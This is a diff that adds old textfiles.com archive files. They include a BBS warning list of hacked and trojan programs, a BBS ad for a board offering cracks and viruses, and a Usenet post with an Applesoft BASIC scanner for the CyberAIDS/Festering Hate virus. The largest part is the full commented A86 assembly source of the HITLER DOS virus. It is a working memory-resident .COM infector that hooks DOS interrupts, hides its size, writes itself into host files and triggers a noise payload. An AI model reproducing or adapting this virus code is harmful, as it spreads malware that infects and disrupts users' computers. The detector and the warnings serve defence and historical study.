+                          ARC-ed, whereas this takes about 2 KB.
+                          What I'm referring to is an archive of
+                          1-3 files that explains how to remove
+                          the serial numbers from copywrite. Now
+                          it's allright to "unprotect" a program
+                          for backup purposes, but removing serial
+                          numbers can only lead to piracy.
+
+DOG101A.COM           HC  This may be hacked; keep an eye out
+                         for it as well as DOG102A.COM.
+
+DOG102A.COM           HC  Apparently this is a renamed early
+                         version of DP102A.ARC, a disk optimizer.
+                         One person has reports that it trashes
+                         hard disks that use DOS 3.1 (2KB
+                         clusters).
+
+FLUSH4.ARC            H   This is apparently FluShot v. 3.0.  Be
+                         careful with this; it comes with a trojan
+                         horse disguised as self-executable
+                         documentation.
+
+LIST60                H   Vern Buerg's LIST 5.1, patched to read
+                         6.0.  Mr. Buerg has released a legitimate
+                         version 6.0 of LIST.  Every legit.
+                         version will have a letter in the
+                         filename (e.g. LIST60H.ARC)
+
+LIST799               H   Vern Buerg's LIST 5.1, patched to read
+                         7.99.
+
+LOCKPICK              MT  This is a text file, usually with a
+                          .TXT extension, that casually explains
+                          how to pick locks.  This is not 
+                          illegal, but it's definitely in
+                          poor taste.  It could be used as
+                          evidence against a burglar, though.
+
+LZM11.EXE      37376  MU  SysOps work hard to maintain BBS's and
+                          to offer quality programs to the general
+                          public.  Although we all may not like
+                          upload/download ratios, common sense
+                          indicates that if a SysOp wants to
+                          maintain an upload/download ratio, then
+                          s/he has that right.  LZM, or Leech
+                          Zmodem, attempts to circumvent this
+                          right.  LZM downloads files using Chuck
+                          Foresburg's DSZ and aborts the transfer
+                          instantly after receiving the last block
+                          of information.  Thus the BBS does not
+                          count the download against the callers
+                          account, thinking the download
+                          unsuccessful, and the caller winds up
+                          with a "free" copy of the file.  SysOps,
+                          please unite against this menace.  I
+                          strongly recommend that you threaten to
+                          permanently remove any caller you catch
+                          using LZM.  Any version of DSZ later
+                          than 1/8/89 can detect and nullify LZM
+                          1.1.  However, LZM 1.2 is already
+                          circulating boards and it reputedly
+                          defeats the 1/13/89 version of DSZ.  Be
+                          Careful.
+
+MONEY.ARC             MT  This text file claims that with minimal
+MONEY.TXT  11648          effort YOU can become a millionaire.
+                          This text file, as some of you may know,
+                          is simply another chain (pyramid) letter
+                          that is of course illegal.  A pyramid
+                          writer sends a letter to four people
+                          requesting money.  Then, according to
+                          the pyramid writer's plan, those four
+                          will send letters to four more asking
+                          for money for themselves and the
+                          original writer.  Unfortunately when the
+                          chain breaks people lose money.  What
+                          one person gains someone else must lose.
+                          That's why this type of letter is
+                          illegal.
+MONOPOLY              MG  Finally I am SURE that this file
+                          violates Parker Brother's rights
+                          to the famous boardgame.  Don Gibson has
+                          agreed that monopoly should NOT be
+                          distributed anymore, so SysOps, please
+                          remove this file from your download
+                          directories.
+
+MOVBASIC or           MU  This highly illegal file, sometimes also
+SBASICA                   called SBASICA, breaks IBM's copyright
+                          on BASIC and BASICA.  It creates new
+                          files called SBASIC or SBASICA that run
+                          "IBM BASIC" on an IBM clone.  C'mon,
+                          don't you think that these clones don't
+                          run IBM BASICA for a good reason?  The
+                          clones don't support BASICA because it's
+                          illegal!  This file comes with Alloy's
+                          PC-Slave card.  Alloy has a license
+                          agreement, and users of the PC-Slave are
+                          allowed to create copies of IBM BASIC
+                          for themselves.  NO ONE ELSE IS.  Stop
+                          complaining that this file is legal,
+                          people; this is one of the more blatent
+                          cases of piracy that I've seen.
+
+NEWARKR.EXE           H   Phil Katz's PKWare Package with all
+                         references to the PKWare license removed.
+
+PKXARC36.EXE          H   Phil Katz's PKXARC 3.5 patched to read
+                         3.6
+
+PKXARC53.EXE          H   Phil Katz's PKXARC 3.5 patched to read
+                         5.3
+
+QMDM110.ARC           H   This is version 1.09 of Qmodem patched
+                         to read 1.10.  There have been rumors of
+                         a worm in 1.10, but I have seen no
+                         evidence of it.  Other versions are OK.
+
+XTALK                 MP  Like Copywrite, there is a patch
+                          circulating BBS's to remove the serial
+                          numbers from Crosstalk.
+
\ No newline at end of file
diff --git a/textfiles.com/virus/hate.txt b/textfiles.com/virus/hate.txt
new file mode 100644
index 00000000..de4e8509
--- /dev/null
+++ b/textfiles.com/virus/hate.txt
@@ -0,0 +1,20 @@
+�������������������������������������������������������������������������ͻ
+����"That which does not kill/   Immortal   \"Teenagers by definition, ����
+���� us makes us stronger." /      Hate      \ don't fit into society" ����
+����                                                                   ����
+����      +Immortal Hate BBS               +450+ Cracks/Cheats/Docs    ����
+����      +806.xXx.xxxx                    +School/Term Papers         ����
+����      +24 hours                        +cDc Files                  ����
+����      +12oo-14.4 bps                   +Series Text Files          ����
+����      +Renegade 4-16                   +UFO/JFK/Conspiracy         ����
+����      +H/P/C/V                         +Song Lyrics                ����
+����      +CCi net                         +MUDnet                     ����
+����      +2100 Text Files                 +All Major/Minor 'Zines     ����
+����      +300+ Virus/Utils/Text           +NO Ratios for LD           ����
+����                                                                   ����
+����                                                                   ����
+����                     VIRaXe World Headquarters                     ����
+����                    F.U.C.K. World Headquarters                    ����
+����                Sysops: Damanstian  &  Max Headroom                ����
+����     Don't call because we hate you...we hate everyone equally     ����
+�������������������������������������������������������������������������ͼ
diff --git a/textfiles.com/virus/hatedetect.vir b/textfiles.com/virus/hatedetect.vir
new file mode 100644
index 00000000..487923e5
--- /dev/null
+++ b/textfiles.com/virus/hatedetect.vir
@@ -0,0 +1,159 @@
+From: Chip Welch (chipw@pro-newfrontier.UUCP)
+Subject: Virus Detection Program 
+Newsgroups: comp.sys.apple
+Date: 1988-07-28 17:34:43 PST
+
+Here is a Virus detection program that just appeared on GEnie.  It will scan
+all SYS programs on a disk and check for the CyberAIDS/Festering Hate virus.
+
+------------Applesoft Program follows:-----------------
+ 
+ 100  REM  This program detects ProDOS 8 SYS files
+ 101  REM    that have been infected with the
+ 102  REM    viruses known as:
+ 105  REM      * CyberAIDS
+ 106  REM      * Festering Hate
+ 120  REM 
+ 121  REM  If you find an infected program in your
+ 122  REM    library, the safest thing to do is to
+ 123  REM    delete it and replace it with an
+ 124  REM    uninfected back up.
+ 130  REM 
+ 131  REM  Written by Tom Weishaar, July 1988
+ 132  REM  Inspiration by Dennis Doms and Eric Mueller
+ 133  REM 
+ 900 D$ =  CHR$ (4)
+ 910  DIM F$(300,1)
+ 1000  TEXT : HOME : PRINT  CHR$ (21)
+ 1001  INVRSE 
+ 1002  PRINT ":    APPLE II VIRUS SCANNER: V 1.0    :"
+ 1003  NORMAL 
+ 1004  PRINT 
+ 1005  PRINT "           COPYRIGHT 1988 BY"
+ 1006  PRINT "     TOM WEISHAAR, OPEN-APPLE/GENIE"
+ 1007  PRINT 
+ 1008  PRINT "FOR THE LATEST VERSION OF THIS PROGRAM,"
+ 1009  PRINT "CHECK OUT CAT 40 IN GENIE'S A2 LIBRARY."
+ 1010  PRINT 
+ 1011  PRINT "FREEWARE: MAY BE COPIED AND DISTRIBUTED"
+ 1012  PRINT " AS LONG AS NO MODIFICATIONS ARE MADE."
+ 1013  PRINT 
+ 1014  PRINT "     PRESS &lt;RETURN&gt; ALONE TO QUIT."
+ 1015  PRINT : PRINT : PRINT 
+ 1020  REM  get slot
+ 1021  PRINT "SCAN DISK DEVICE IN WHICH SLOT? ";
+ 1022  INPUT "";S$: IF S$ = "" THEN  PRINT D$;"BYE"
+ 1023 S =  VAL (S$):
+ 1024  IF S &lt; 1 OR S &gt; 7 THEN  PRINT  CHR$ (7): GOTO 1020
+ 1040  REM  get drive
+ 1041  PRINT "                IN WHICH DRIVE? ";
+ 1042  INPUT "";DR$: IF DR$ = "" THEN 1020
+ 1043 D =  VAL (DR$):
+ 1044  IF D &lt; 1 OR D &gt; 2 THEN  PRINT  CHR$ (7): GOTO 1040
+ 1100  REM  start disk scan
+ 1110  ONERR  GOTO 1190
+ 1120  PRINT D$;"PREFIX,S";S;",D";D
+ 1121  PRINT D$;"PREFIX"
+ 1122  INPUT F$: GOSUB 4000:F$(0,0) = F$:F$(0,1) = "DIR"
+ 1123  POKE 216,0
+ 1130  PRINT : PRINT "CHECKING ";F$(0,0)
+ 1131  PRINT "THIS MAY TAKE AWHILE....": PRINT 
+ 1140  PRINT D$;"BLOAD ";F$(0,0);",TDIR,A$300,B511,L1"
+ 1141  IF  PEEK (768) = 0 THEN 1150
+ 1142  PRINT "CAUTION: VIRUS COUNTER ON THIS DISK="; PEEK (768)
+ 1150  REM  clear F$(x,x) array
+ 1151 FPNT = 1
+ 1152  IF F$(FPNT,1) = "" THEN  GOTO 1154
+ 1153 F$(FPNT,1) = "":FPNT = FPNT + 1: GOTO 1152
+ 1154 FPNT = 0:DIRPNT = 1:NSYS = 0: GOTO 1200
+ 1190  REM  handle no device connected error
+ 1191  IF  PEEK (222) &lt;  &gt; 3 AND  PEEK (222) &lt;  &gt; 8 THEN 9900
+ 1192  CALL  - 3288
+ 1193  PRINT  CHR$ (7)
+ 1194  IF  PEEK (222) = 3 THEN  PRINT "NO DEVICE AT SLOT ";S;", DRIVE ";D
+ 1195  IF  PEEK (222) = 8 THEN  PRINT "I/O ERROR AT SLOT ";S;", DRIVE ";D
+ 1196  PRINT 
+ 1197  POKE 216,0: GOTO 1020
+ 1200  REM  main loop
+ 1210  IF F$(FPNT,1) = "DIR" THEN  GOSUB 2000:FPNT = FPNT + 1: GOTO 1210
+ 1220  IF F$(FPNT,1) = "SYS" THEN  GOSUB 3000:FPNT = FPNT + 1: GOTO 1210
+ 1230  PRINT : IF NSYS THEN M$ = "MORE "
+ 1240  PRINT "NO ";M$;"SYS FILES ON THIS DISK. ";
+ 1250 M$ = ""
+ 1260  INPUT "";A$
+ 1270  GOTO 1000
+ 2000  REM  search a directory for DIR and SYS files
+ 2010  ONERR  GOTO 2900
+ 2011  PRINT D$;"OPEN ";F$(FPNT,0);" ,TDIR"
+ 2012  PRINT D$;"READ ";F$(FPNT,0)
+ 2013  INPUT F$: IF  LEN (F$) &lt; 40 THEN 2013
+ 2014  INPUT F$
+ 2100  REM  search directory loop
+ 2110  INPUT F$: ON F$ = "" GOTO 2910
+ 2111 DIR$ =  MID$ (F$,18,3):F$ =  MID$ (F$,2,16)
+ 2112  GOSUB 4000
+ 2120 F$(DIRPNT,0) = F$(FPNT,0) + "/" + F$
+ 2130  IF DIR$ = "DIR" THEN F$(DIRPNT,1) = "DIR":DIRPNT = DIRPNT + 1
+ 2140  IF DIR$ = "SYS" THEN F$(DIRPNT,1) = "SYS":DIRPNT = DIRPNT + 1
+ 2150  GOTO 2110
+ 2900  REM  handle end-of-file error
+ 2901  IF  PEEK (222) &lt;  &gt; 5 THEN 9900
+ 2902  CALL  - 3288
+ 2910  POKE 216,0
+ 2911  PRINT D$;"CLOSE"
+ 2912  RETURN 
+ 3000  REM  do virus check on a SYS file
+ 3005  ONERR  GOTO 3900
+ 3010  PRINT D$;"BLOAD";F$(FPNT,0);",A$300,L6,B0,TSYS"
+ 3020 DETECT = 1:NSYS = NSYS + 1:TTL = 0
+ 3030  FOR ADR = 771 TO 773
+ 3031 :TTL = TTL +  PEEK (ADR): IF TTL &gt; 256 THEN TTL = TTL - 256
+ 3032  NEXT 
+ 3040  IF TTL &lt;  &gt; 57 THEN 3700
+ 3050 ADR = ( PEEK (769) + ( PEEK (770) * 256)) - 8192
+ 3060  PRINT D$;"BLOAD";F$(FPNT,0);",A$300,L4,B";ADR;",TSYS"
+ 3070  IF  PEEK (768) &lt;  &gt; 32 THEN DETECT = 0
+ 3071  IF  PEEK (769) &lt;  &gt; 88 THEN DETECT = 0
+ 3072  IF  PEEK (770) &lt;  &gt; 255 THEN DETECT = 0
+ 3073  IF  PEEK (771) &lt;  &gt; 186 THEN DETECT = 0
+ 3690  ON DETECT GOTO 3800
+ 3700  REM  no virus in this file
+ 3710  PRINT "OK: ";F$(FPNT,0)
+ 3720  POKE 216,0: RETURN 
+ 3800  REM  file appears infected
+ 3810 DCNT = DCNT + 1
+ 3820  PRINT  CHR$ (7)
+ 3822  PRINT F$(FPNT,0);" APPEARS INFECTED."
+ 3825  PRINT "   DELETE IT? (Y/N) ";
+ 3830  GET A$: PRINT A$: PRINT 
+ 3840  IF A$ = "Y" OR A$ = "y" THEN  GOSUB 3860
+ 3850  POKE 216,0: RETURN 
+ 3860  REM  delete current file
+ 3870  PRINT D$;"UNLOCK";F$(FPNT,0)
+ 3880  PRINT D$;"DELETE";F$(FPNT,0)
+ 3890  RETURN 
+ 3900  REM  handle end-of-file error
+ 3901  IF  PEEK (222) &lt;  &gt; 5 THEN 9900
+ 3902  CALL  - 3288
+ 3903 DETECT = 0: GOTO 3200
+ 4000  REM  delete trailing spaces &amp; slash in F$
+ 4010  FOR I =  LEN (F$) TO 2 STEP  - 1
+ 4020  IF  MID$ (F$,I,1) = " " OR  MID$ (F$,I,1) = "/" THEN F$ =  LEFT$ (F$,I
+- 1)
+ 4030  NEXT 
+ 4040  RETURN 
+ 9900  REM  fatal error
+ 9910  PRINT "ERROR #"; PEEK (222);" IN LINE "; PEEK (218) +  PEEK (219) * 256
+ 9920  END 
+
+I hope this will help to eliminate the viruses now existing.  If you are
+writing programs, you should consider having your finished program check it's
+own End of File marker and notify the user if the length of the program has
+changed.  Does anyone have any other suggestions on how to prevent Viruses
+when writing programs?
+
+                             Apple ][ Forever!!!
+  UUCP: crash!pro-newfrontier!chipw
+  ARPA: crash!pro-newfrontier!chipw@nosc.mil
+  INET: chipw@pro-newfrontier.cts.com
+  GEnie: C.WELCH3 [Chip]
diff --git a/textfiles.com/virus/hitler.a86 b/textfiles.com/virus/hitler.a86
new file mode 100644
index 00000000..886b37d9
--- /dev/null
+++ b/textfiles.com/virus/hitler.a86
@@ -0,0 +1,718 @@
+;The HITLER virus: commented in a rough 'n' ready way by the 
+;Crypt Newsletter staff for issue #11, January 1993.                
+;The HITLER virus is a memory resident .COM infector which adds itself
+;to the end of infected files. HITLER employs
+;minimal directory stealth. 
+;The minimal stealth allows the virus to subtract its file size from                
+;infected targets when the user takes a look at them using "dir"
+;functions while the virus is in memory.
+;Most of HITLER's code is devoted to a huge data table which is a voice
+;sample of some nut shouting "HITLER."  The virus ties the effect to
+;the timer tick function, but if you want to hear it immediately, change the
+;source were indicated. The resulting code will assemble under A86. On
+;execution the virus will lock the PC into the voice effect until reboot,
+;rendering it uninfective, if annoying.  Not all PC's can generate the
+;HITLER sound effect - some will just buzz.
+
+
+                call    rakett      ; recalculate offset
+old             db '� �!�'          ; virus identification marker
+rakett:         pop     bp
+                push    bp
+                add     bp,-103h
+
+                mov     ax,42ABh    ; check if virus installed
+                int     21h
+                jnc     failed      ; exit if here
+
+                cli
+                mov     ax,3521h
+                int     21h                         ; get interrupt vector
+                mov     w [bp+offset old21],bx      ; es:bx points to
+                mov     w [bp+offset old21+2],es    ; interrupt handler
+
+                mov     al,1Ch                      
+                int     21h                         
+                cli
+                mov     w [bp+offset old1C],bx      ; access timer tick int.
+                mov     w [bp+offset old1C+2],es
+                mov     w [bp+offset teller],16380  ; stuff our value into
+                sti                                 ; "teller" buffer for
+                                                    ; later
+                call    normalspeed                 ; eh?
+
+                mov     si,ds
+                std
+                lodsb
+                cld
+                mov     ds,si
+
+                xor     bx,bx
+                mov     cx,pgf
+                cmp     b [bx],'Z'
+                jne     failed
+                mov     ax,[bx+3]
+                sub     ax,cx
+                jc      failed
+                mov     [bx+3],ax
+                sub     [bx+12h],cx
+                mov     es,[bx+12h]
+
+                push    cs
+                pop     ds
+
+                mov     di,100h
+                mov     si,bp
+                add     si,di
+                mov     cx,size
+                rep     movsb
+
+                push    es
+                pop     ds
+                mov     ax,2521h
+                mov     dx,offset ni21     ; set int 21 route through virus
+                int     21h
+                mov     al,1Ch
+                mov     dx,offset ni1C     ; revector timer tick through
+                int     21h                ; virus
+
+failed:         push    cs
+                push    cs
+                pop     ds
+                pop     es
+
+                pop     si
+                mov     di,100h
+                push    di
+                movsw
+                movsw
+                movsb
+
+                mov     cx,0FFh
+                mov     si,100h
+                ret                    ; exit to host
+
+
+findFCB:        popf
+                call    int21          ; look to virus "stealth" 
+                pushf                  ; routine, now that int 21
+                or      al,al          ; comes through virus
+                jnz     backFCB
+                call    stealth
+backFCB:        popf
+                iret
+
+stealth:        push    ax          ; the following essentially massages the
+                push    bx          ; file control block on directory scans,
+                push    dx         ; subtracting the virus size from infected
+                push    es          ; files before the user sees 'em
+
+                mov     ah,2Fh       ; get disk transfer address
+                call    int21        ; 
+
+                cmp     byte es:[bx],0FFh ; failed? 
+                jne     normFCB           ; no, everything still OK
+                add     bx,8
+normFCB:        mov     al,byte es:[bx+16h]  ; retrieve seconds attribute 
+                and     al,31                ; from observed file, if it's
+                xor     al,31                ; 31, the file is infected
+                jnz     shitFCB              ; not 31 - file not infected
+                mov     ax,word es:[bx+1Ch]
+                mov     dx,word es:[bx+1Ch+2]
+                sub     ax,size              ; subtract virus length from
+                sbb     dx,0                 ; infected file
+                jc      shitFCB              ; no files? exit
+                mov     word es:[bx+1Ch],ax
+                mov     word es:[bx+1Ch+2],dx
+shitFCB:                                     ; restore everything as normal
+                pop     es
+                pop     dx
+                pop     bx
+                pop     ax
+                ret
+
+ni21:           pushf
+                cmp     ah,11h    ; any user access of the file control
+                je      findFCB   ; block must come through virus
+                cmp     ah,12h    ; ditto for here
+                je      findFCB
+
+                cmp     ax,42ABh  ; 
+                jne     not_42AB
+                popf
+                clc
+                retf    2
+not_42AB:
+                cmp     ax,4B00h    ; is a program being loaded?
+                jne     not_4B00    ; exit if not
+
+                call    install_24  ; install critical error handler
+
+                push    ax
+                push    bx
+                push    cx
+                push    dx
+                push    ds
+                push    bp
+
+                mov     ax,4300h     ; get file attributes of potential host
+                call    int21
+                jc      back1        ; failed? exit
+                mov     cs:old_attr,cx   ; stash attributes here
+
+                test    cl,4         ; is the potential host a system file?
+                jnz     back1        ; yes? so exit
+
+                mov     ax,4301h     ; set new file attributes, read or write
+                xor     cx,cx
+                call    int21
+                jc      back1        ; error? exit
+
+                push    dx
+                push    ds
+                call    infect       ; begin infection stuff
+                pop     ds
+                pop     dx
+
+                mov     ax,4301h
+db              0B9h    ;mov CX,...
+old_attr        dw 0
+                call    int21
+
+back1:                             ;go here if the attrib-get fails
+                pop     bp
+                pop     ds
+                pop     dx
+                pop     cx
+                pop     bx
+                pop     ax
+
+call    remove_24                 ; normalize critical error handler
+
+not_4B00:
+back:           popf
+                db 0EAh
+old21           dw 0,0
+
+int21:          pushf
+                call    dword ptr cs:old21
+                ret
+
+infect:         mov     ax,3D02h    ; open host file with read/write access
+                call    int21
+                jnc     okay_open
+bad1:           ret                 ; was there an error? exit
+okay_open:      xchg    bx,ax
+                mov     ax,5700h    ; get file date and file time
+                call    int21
+                push    cx
+                mov     bp,sp
+                push    dx
+
+                mov     ah,3Fh   ; read first five bytes from potential host
+                mov     cx,5
+                mov     dx,offset old ; store them here
+                push    cs
+                pop     ds
+                call    int21
+                jc      close     ; error, exit?
+                cmp     al,5      ; get the five bytes?
+                jne     close     ; no, so exit
+
+                cmp     word old[0],'MZ'  ; is this an .EXE file?
+                je      close             ; yes, so go away
+                cmp     word old[0],'ZM' ; double-check, is this an .EXE file?
+                je      close             ; yes, so go away
+                cmp     old[0],0E9h       ; does it start with a jump?
+                jne     infect1           ; no - infect!
+                cmp     word old[3],'�!'  ; does it start with the HITLER virus
+                jne     infect1           ; marker? If no, infect!
+                                          ; (Boy, this fellow is careful!)
+close:          pop     dx
+                pop     cx
+                mov     ax,5701h         ; reset file date and time
+                call    int21
+                mov     ah,3Eh           ; close file
+                call    int21
+                ret
+
+infect1:        mov     ax,4202h         ; reset pointer to end of file
+                xor     cx,cx
+                xor     dx,dx
+                call    int21
+
+                or      dx,dx
+                jnz     close
+                cmp     ax,59000       ; compare .COMfile size to 59,000 bytes
+                jae     close          ; greater than or equal? close file
+                               ; HITLER is a big virus, so we don't want to
+                dec     ax     ; exceed the DOS execution boundary for .COM
+                dec     ax     ; files
+                dec     ax
+
+                mov     word ptr putjmp[1],ax
+
+                mov     ah,40h         ; write HITLER to the target file
+                mov     cx,size        ; length in CX
+                mov     dx,100h
+                call    int21
+                jc      close
+                cmp     ax,size        ; again, we're being real careful
+                jne     close          ; not to infect ourself
+
+                mov     ax,4200h      ; set file pointer to beginning of host
+                xor     cx,cx
+                xor     dx,dx
+                call    int21
+
+                mov     ah,40h        ; write the first five bytes of the
+                mov     cx,5          ; viral jump and ID strings to the
+                mov     dx,offset putjmp ; beginning of the host file
+                call    int21
+
+                or      byte ss:[bp],31 ; set the seconds field to 31, so the
+                                    ; "stealth" routine has its cue
+                jmp     close        ; close the file and clean up
+
+putjmp          db 0E9h
+                dw 0
+                db '!�'
+
+install_24:     pushf               ; installation of critical error
+                cli                 ; handler (no shit, Sherlock!)
+                push    bx
+                push    ds
+                xor     bx,bx
+                mov     ds,bx
+                push    ds
+                lds     bx,[24h*4]
+                mov     cs:old24[0],bx
+                mov     cs:old24[2],ds
+                pop     ds
+                mov     word [(24h*4)],offset ni24
+                mov     [(24h*4)+2],cs
+                pop     ds
+                pop     bx
+                sti
+                popf
+                ret
+
+remove_24:      pushf              ; remove it
+                cli
+                push    bx
+                push    es
+                push    ds
+                xor     bx,bx
+                mov     ds,bx
+                les     bx,cs:old24[0]
+
+                mov     [(24h*4)],bx
+                mov     [(24h*4)+2],es
+
+                pop     ds
+                pop     es
+                pop     bx
+                sti
+                popf
+                ret
+
+errflag         db 0
+
+db 'Hitler Virus by Dreamer/DY',0       ; ID note by Dreamer of Demoralized
+                                        ; Youth
+ni24:           mov     al,3
+                mov     cs:errflag,1
+                iret
+
+old24           dw      0,0
+
+xofs            dw offset sample
+len             equ 4131
+divisor         equ 230
+teller          dw 16380            ; "new" timer tick values for viral
+                                    ; trigger
+ni1C:
+                cli
+                pushf
+                push    ax
+                push    ds
+                push    si
+
+                push    cs
+                pop     ds
+               ; -lobotomize code from here to marker to get HITLER at start
+                cmp     teller,0    ; compare 0 with the value the virus
+                je      teller_ok   ; stuffed into the timer tick interrupt
+                dec     teller      ; if equal - do "HITLER!" thing, if not
+                jmp     noreset     ; decrement the value
+               ; -bottom of lobotomy marker
+teller_ok:                        ; sound routine to the IBM internal speaker
+                mov     al,34h
+                db      0E6h,43h        ;out 43h,al
+                mov     al,divisor
+                db      0E6h,40h        ;out 40h,al
+                mov     al,0
+                db      0E6h,40h        ;out 40h,al
+
+                mov     al,090h
+                db      0E6h,43h        ;out 43h,al
+                mov     si,xofs
+                lodsb
+                db      0E6h,42h        ;out 42h,al
+
+                db      0E4h,61h        ;in al,61h
+                or      al,3
+                db      0E6h,61h        ;out al,61h
+
+                inc     xofs
+                cmp     xofs,len+offset sample  ; points to the huge table at
+                jb      noreset                 ; the end of the virus, a
+                mov     xofs,offset sample      ; .VOC sample of some nut
+noreset:                                        ; shouting "HITLER!"
+                sti
+                pop     si
+                pop     ds
+                pop     ax
+                popf
+
+                db      0EAh
+old1C           dw      0,0
+
+normalspeed:    cli
+                push    ax
+                mov     al,34h
+                db      0E6h,43h
+                mov     al,0
+                db      0E6h,40h
+                db      0E6h,40h
+                pop     ax
+                sti
+                ret
+
+sample:
+
+
+
+
+        db 080h,080h,080h,080h,080h,081h,080h,081h,081h,081h,081h,081h,083h
+        db 083h,083h,083h,083h,083h,083h,083h,083h,083h,081h,081h,081h,081h
+        db 080h,080h,080h,080h,080h,080h,080h,080h,080h,080h,065h,000h,000h
+        db 075h,08Ah,084h,083h,083h,089h,081h,081h,081h,07Ah,079h,07Ch,07Ah
+        db 07Bh,07Ch,07Fh,07Ah,078h,079h,07Fh,07Bh,07Fh,07Dh,07Bh,07Ah,07Fh
+        db 083h,08Ah,08Ch,088h,08Ah,085h,083h,089h,08Bh,080h,082h,07Fh,081h
+        db 07Fh,082h,081h,08Bh,07Ah,074h,07Ch,07Eh,080h,07Fh,07Fh,083h,07Fh
+        db 084h,082h,083h,080h,083h,081h,07Dh,07Eh,080h,083h,083h,07Dh,079h
+        db 07Fh,084h,080h,07Bh,07Dh,07Fh,07Fh,07Ch,07Ah,07Dh,083h,081h,07Fh
+        db 082h,080h,07Bh,07Fh,08Ah,08Bh,086h,085h,086h,083h,089h,089h,086h
+        db 084h,07Dh,07Ch,07Eh,085h,086h,085h,086h,083h,081h,088h,087h,080h
+        db 07Dh,081h,083h,081h,080h,07Ch,07Eh,076h,075h,07Bh,07Ah,075h,072h
+        db 075h,06Fh,074h,07Eh,080h,07Fh,07Fh,07Fh,083h,087h,085h,084h,08Ah
+        db 08Bh,086h,087h,08Ah,08Ah,08Ah,081h,081h,089h,084h,081h,07Ch,086h
+        db 083h,084h,082h,07Fh,082h,07Fh,087h,086h,082h,080h,076h,07Ch,07Bh
+        db 07Bh,082h,07Dh,07Eh,07Ah,07Fh,07Eh,085h,084h,082h,084h,07Eh,088h
+        db 07Fh,088h,07Eh,07Fh,07Dh,077h,07Ch,075h,07Dh,078h,07Bh,079h,07Fh
+        db 080h,084h,088h,081h,083h,087h,084h,087h,082h,089h,08Bh,08Fh,08Dh
+        db 08Bh,087h,080h,083h,081h,08Ch,07Ah,082h,076h,07Fh,07Bh,07Ah,07Ah
+        db 07Ch,077h,072h,077h,07Ch,07Fh,080h,07Eh,07Bh,07Dh,07Ah,080h,07Ch
+        db 07Eh,076h,082h,082h,08Dh,089h,084h,085h,085h,086h,087h,089h,086h
+        db 085h,08Ch,087h,090h,085h,07Ch,082h,083h,087h,07Ch,088h,07Bh,074h
+        db 091h,085h,09Bh,086h,086h,070h,076h,079h,08Dh,080h,06Bh,063h,069h
+        db 07Dh,067h,04Ch,081h,07Ah,0ABh,0A8h,09Ch,08Eh,060h,056h,07Fh,088h
+        db 089h,075h,094h,08Ch,013h,092h,040h,0D7h,0B0h,097h,0C4h,036h,057h
+        db 082h,0CBh,0C5h,09Dh,0C8h,00Dh,0A5h,026h,0A7h,072h,06Bh,0E0h,032h
+        db 089h,07Ah,0A7h,0E4h,0D7h,048h,07Fh,034h,07Bh,054h,06Fh,0B6h,02Bh
+        db 06Ah,055h,0ABh,0C0h,032h,09Fh,074h,06Fh,0A4h,043h,0B6h,040h,087h
+        db 090h,095h,0FFh,060h,015h,074h,039h,0E0h,044h,0D7h,080h,027h,0C9h
+        db 070h,0E7h,0F8h,025h,0AEh,009h,0ABh,050h,067h,0ACh,01Ch,0E3h,068h
+        db 09Fh,0FFh,02Fh,0CEh,014h,09Fh,080h,023h,0C4h,056h,0D3h,075h,0AFh
+        db 0F4h,035h,0A8h,000h,077h,040h,000h,09Ch,05Bh,0BBh,078h,0EBh,0D4h
+        db 07Fh,0A8h,007h,0BDh,032h,04Dh,092h,087h,0D4h,08Dh,0FFh,070h,0D7h
+        db 04Ch,06Bh,08Ch,01Ah,08Fh,078h,092h,087h,0CFh,0E8h,06Fh,0A0h,000h
+        db 0A5h,01Ch,007h,069h,073h,0B0h,07Fh,0FFh,068h,0D1h,028h,067h,070h
+        db 009h,09Bh,05Ch,0BFh,06Ch,0DFh,0A0h,09Fh,080h,01Bh,0A0h,020h,077h
+        db 082h,08Bh,0A8h,0A7h,0F0h,077h,0C8h,011h,0BAh,044h,033h,0B0h,069h
+        db 0B2h,08Eh,0FFh,068h,0DAh,018h,06Fh,060h,00Dh,0BAh,053h,0AFh,06Eh
+        db 0D7h,0B0h,07Fh,080h,00Ah,0B2h,020h,055h,080h,05Dh,098h,09Bh,0C0h
+        db 07Fh,094h,009h,0AFh,032h,05Bh,080h,05Ah,093h,093h,0FFh,071h,0DCh
+        db 030h,07Fh,080h,01Fh,0BBh,074h,0F2h,079h,0E7h,074h,0DFh,050h,03Fh
+        db 0A2h,02Ch,0B7h,070h,06Dh,072h,0AFh,0F0h,05Ah,0A2h,000h,095h,032h
+        db 01Fh,094h,06Bh,0E0h,054h,0F6h,059h,0E3h,048h,05Fh,0A0h,033h,0BFh
+        db 074h,073h,070h,0E7h,0A0h,06Bh,074h,000h,0A1h,024h,027h,065h,08Dh
+        db 097h,0BBh,0FFh,06Ah,0E2h,04Ah,07Fh,084h,003h,087h,04Fh,0CDh,075h
+        db 0E5h,0B8h,09Dh,0A8h,019h,0C2h,048h,047h,0A0h,05Ch,071h,077h,0FFh
+        db 068h,06Bh,074h,00Fh,0BBh,010h,077h,048h,087h,0A4h,087h,0FCh,07Dh
+        db 0F0h,040h,0C7h,082h,047h,0B8h,04Ah,099h,05Eh,0DBh,082h,087h,058h
+        db 000h,098h,020h,06Fh,072h,06Fh,0A8h,083h,0FFh,059h,0E5h,052h,067h
+        db 0AAh,028h,0B9h,03Fh,0C6h,05Ch,0AFh,0C0h,087h,0A0h,00Eh,0BBh,04Ah
+        db 08Fh,080h,03Fh,078h,064h,0FFh,068h,093h,068h,01Fh,0B6h,020h,092h
+        db 04Bh,0B7h,08Ah,095h,0D8h,08Bh,0C0h,021h,0C7h,06Ah,07Fh,09Ch,067h
+        db 085h,04Eh,0FFh,070h,09Fh,050h,000h,0ADh,021h,08Fh,058h,0BFh,084h
+        db 075h,0E0h,06Fh,0D0h,014h,0ABh,074h,077h,0B8h,046h,096h,056h,0EFh
+        db 098h,07Fh,098h,000h,0A3h,038h,05Fh,070h,06Fh,0A4h,04Bh,0E4h,054h
+        db 0D9h,040h,06Fh,098h,05Dh,0C2h,051h,095h,054h,095h,0DCh,06Fh,0B8h
+        db 000h,06Fh,068h,03Fh,0A0h,057h,0E0h,049h,0DDh,084h,0C7h,074h,025h
+        db 0D8h,05Bh,0E6h,04Ch,08Fh,068h,03Fh,0E8h,04Ah,0CFh,032h,033h,0A0h
+        db 039h,0C2h,040h,0D7h,05Ch,09Bh,0A0h,087h,098h,029h,0D5h,070h,09Fh
+        db 082h,07Bh,084h,03Dh,0D5h,068h,0BDh,02Ch,01Bh,0A8h,040h,0BDh,054h
